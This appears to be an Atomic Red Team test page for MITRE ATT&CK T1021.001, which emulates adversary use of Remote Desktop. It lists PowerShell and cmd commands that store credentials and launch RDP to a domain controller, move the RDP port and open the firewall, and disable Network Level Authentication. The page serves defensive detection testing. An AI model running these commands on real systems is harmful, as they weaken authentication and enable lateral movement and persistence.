Skip to content

Latest commit

 

History

History
199 lines (112 loc) · 6.77 KB

T1021.001.md

File metadata and controls

199 lines (112 loc) · 6.77 KB

T1021.001 - Remote Services: Remote Desktop Protocol

Description from ATT&CK

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features or Terminal Services DLL for Persistence.(Citation: Alperovitch Malware)

Atomic Tests


Atomic Test #1 - RDP to DomainController

Attempt an RDP session via Remote Desktop Application to a DomainController.

Supported Platforms: Windows

auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e

Inputs:

Name Description Type Default Value
logonserver ComputerName argument default %logonserver% string $ENV:logonserver.TrimStart("\")
domain domain argument default %USERDOMAIN% string $Env:USERDOMAIN
username Username argument default %username% string $ENV:USERNAME
password Password string 1password2!

Attack Commands: Run with powershell!

$Server=#{logonserver}
$User = Join-Path #{domain} #{username}
$Password="#{password}"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"

Cleanup Commands:

$p=Tasklist /svc /fi "IMAGENAME eq mstsc.exe" /fo csv | convertfrom-csv
if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }

Dependencies: Run with powershell!

Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually


Atomic Test #2 - Changing RDP Port to Non Standard Port via Powershell

Changing RDP Port to Non Standard Port via Powershell

Supported Platforms: Windows

auto_generated_guid: 2f840dd4-8a2e-4f44-beb3-6b2399ea3771

Inputs:

Name Description Type Default Value
OLD_Remote_Port Default RDP Listening Port string 3389
NEW_Remote_Port New RDP Listening Port string 4489

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}

Cleanup Commands:

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port}
Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction Ignore 
Get-Service TermService | Restart-Service -Force -ErrorAction Ignore


Atomic Test #3 - Changing RDP Port to Non Standard Port via Command_Prompt

Changing RDP Port to Non Standard Port via Command_Prompt

Supported Platforms: Windows

auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73

Inputs:

Name Description Type Default Value
OLD_Remote_Port Default RDP Listening Port string 3389
NEW_Remote_Port New RDP Listening Port string 4489

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}

Cleanup Commands:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1
netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
net stop TermService /y >nul 2>&1
net start TermService >nul 2>&1


Atomic Test #4 - Disable NLA for RDP via Command Prompt

Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/ See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py

Supported Platforms: Windows

auto_generated_guid: 01d1c6c0-faf0-408e-b368-752a02285cb2

Inputs:

Name Description Type Default Value
Default_UserAuthentication Default UserAuthentication registry value string 1

Attack Commands: Run with command_prompt!

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f

Cleanup Commands:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d #{Default_UserAuthentication} /t REG_DWORD -f >nul 2>&1